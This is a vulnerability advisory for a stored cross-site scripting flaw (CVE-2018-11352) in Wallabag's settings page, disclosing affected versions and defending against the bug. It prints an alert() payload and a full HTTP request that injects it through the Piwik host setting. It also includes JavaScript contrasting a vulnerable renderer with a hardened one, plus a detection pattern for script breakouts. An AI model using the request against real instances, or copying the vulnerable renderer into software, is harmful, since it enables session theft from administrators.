Wallabag 2.2.3 to 2.3.2 - Stored Cross-Site Scripting
The Wallabag application is affected by one cross-site scripting (XSS) vulnerability that is stored within the configuration page. This vulnerability enables the execution of a JavaScript payload each time an administrator visits the configuration page. The vulnerability can be exploited with authentication and used to target administrators and steal their sessions.
Product Description
Wallabag is an open source RSS reader application, distributed under an MIT license. The project's official website is wallabag.org. The vulnerability described in this document affects version 2.2.3 (released on May 18, 2017) through version 2.3.2 (released on January 22, 2018).
Vulnerabilities List
One vulnerability was identified within the Wallabag web application:
- One instance of stored cross-site scripting
Affected Version
Version 2.2.3 to 2.3.2
Vulnerability Details
- CVE ID: CVE-2018-11352
- Access Vector: Remote
- Security Risk: Medium
- Vulnerability: CWE-79
- CVSS Base Score: 4.9
- CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
The XSS vulnerability is located on the internal settings configuration page. By injecting a JavaScript payload into this page, an attacker can steal an administrator session. An admin account is required to exploit this instance. The vulnerable parameter is craue_config_modifySettings[settings][23][value]. To trigger the vulnerability, Piwik must be enabled, which is done by setting the parameter craue_config_modifySettings[settings][22][value] to 1. The following payload can be used to demonstrate the attack:
";</script><script>alert(/XSS/)</script>
Figure 1 - XSS Payload
The request below can be used to exploit the vulnerability:
POST /settings HTTP/1.1
Host: HOST
Cookie: PHPSESSID=SESSIONID

craue_config_modifySettings%5Bsettings%5D%5B22%5D%5Bvalue%5D=1&craue_config_modifySettings%5Bsettings%5D%5B23%5D%5Bvalue%5D=v2.wallabag.org%22%3B%3C%2Fscript%3E%3Cscript%3Ealert%28%2FXSS%2F%29%3C%2Fscript%3E&craue_config_modifySettings%5Bsettings%5D%5B24%5D%5Bvalue%5D=1&craue_config_modifySettings%5Bsettings%5D%5B0%5D%5Bvalue%5D=1&craue_config_modifySettings%5Bsettings%5D%5B1%5D%5Bvalue%5D=1&craue_config_modifySettings%5Bsettings%5D%5B2%5D%5Bvalue%5D=1&craue_config_modifySettings%5Bsettings%5D%5B3%5D%5Bvalue%5D=http%3A%2F%2Fdiasporapod.com&craue_config_modifySettings%5Bsettings%5D%5B4%5D%5Bvalue%5D=1&craue_config_modifySettings%5Bsettings%5D%5B5%5D%5Bvalue%5D=https%3A%2F%2Funmark.it&craue_config_modifySettings%5Bsettings%5D%5B6%5D%5Bvalue%5D=1&craue_config_modifySettings%5Bsettings%5D%5B7%5D%5Bvalue%5D=http%3A%2F%2Fmyshaarli.com&craue_config_modifySettings%5Bsettings%5D%5B8%5D%5Bvalue%5D=1&craue_config_modifySettings%5Bsettings%5D%5B9%5D%5Bvalue%5D=1&craue_config_modifySettings%5Bsettings%5D%5B19%5D%5Bvalue%5D=1&craue_config_modifySettings%5Bsettings%5D%5B28%5D%5Bvalue%5D=0&craue_config_modifySettings%5Bsettings%5D%5B10%5D%5Bvalue%5D=1&craue_config_modifySettings%5Bsettings%5D%5B11%5D%5Bvalue%5D=1&craue_config_modifySettings%5Bsettings%5D%5B12%5D%5Bvalue%5D=1&craue_config_modifySettings%5Bsettings%5D%5B13%5D%5Bvalue%5D=1&craue_config_modifySettings%5Bsettings%5D%5B14%5D%5Bvalue%5D=1&craue_config_modifySettings%5Bsettings%5D%5B15%5D%5Bvalue%5D=1&craue_config_modifySettings%5Bsettings%5D%5B16%5D%5Bvalue%5D=1&craue_config_modifySettings%5Bsettings%5D%5B17%5D%5Bvalue%5D=0&craue_config_modifySettings%5Bsettings%5D%5B18%5D%5Bvalue%5D=0&craue_config_modifySettings%5Bsettings%5D%5B20%5D%5Bvalue%5D=https%3A%2F%2Fwww.wallabag.org%2Fpages%2Fsupport.html&craue_config_modifySettings%5Bsettings%5D%5B21%5D%5Bvalue%5D=&craue_config_modifySettings%5Bsettings%5D%5B25%5D%5Bvalue%5D=0&craue_config_modifySettings%5Bsettings%5D%5B26%5D%5Bvalue%5D=wallabag&craue_config_modifySettings%5Bsettings%5D%5B27%5D%5Bvalue%5D=0&action=&craue_config_modifySettings%5B_token%5D=CSRFTOKEN
Figure 2 - XSS Exploitation Request
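The payload's leading `";` shows why the stored value is dangerous: it closes a JavaScript string inside an inline script block, and `</script>` then closes the element so the rest is parsed as fresh HTML. The following is an added example, not Wallabag's code, that models a simplified settings page emitting the Piwik host into such a script (the template shape is an assumption), shows the hardened rendering that keeps the value inside the string literal, and includes a helper for reviewing stored settings for the same breakout pattern.

```javascript
// Added example (not Wallabag's own code). The template below is a hypothetical
// stand-in for a page that emits the configured Piwik host in an inline script.

// Constructed sample: the Figure 1 payload, prefixed with the default host
// exactly as it appears in the Figure 2 request body.
const SAMPLE_VALUE = 'v2.wallabag.org";</script><script>alert(/XSS/)</script>';

// Vulnerable rendering: the raw setting value is concatenated into JavaScript
// source. `";` ends the string and statement, `</script>` ends the element, and
// the browser parses whatever follows as new markup.
function renderPiwikSnippetVulnerable(piwikHost) {
  return '<script>var piwikHost = "' + piwikHost + '";</script>';
}

// Hardened rendering: serialise the value as a JSON string literal, then
// \u-escape `<`, `>` and the JS line terminators U+2028/U+2029. The HTML parser
// never sees a closing tag inside the script body, and JSON.parse/JS still
// recover the original string unchanged.
function toJsStringLiteral(value) {
  return JSON.stringify(String(value)).replace(/[<>\u2028\u2029]/g, (c) => {
    return '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0');
  });
}

function renderPiwikSnippetHardened(piwikHost) {
  return '<script>var piwikHost = ' + toJsStringLiteral(piwikHost) + ';</script>';
}

// Review helper for stored settings: a Piwik host should never contain a
// closing script tag; flag rows that would break out if rendered unescaped.
function looksLikeScriptBreakout(value) {
  return /<\/script/i.test(String(value));
}

// Number of <script ...> elements the HTML parser would see; a correctly
// rendered snippet must yield exactly one.
function countScriptElements(html) {
  return (html.match(/<script\b/gi) || []).length;
}
```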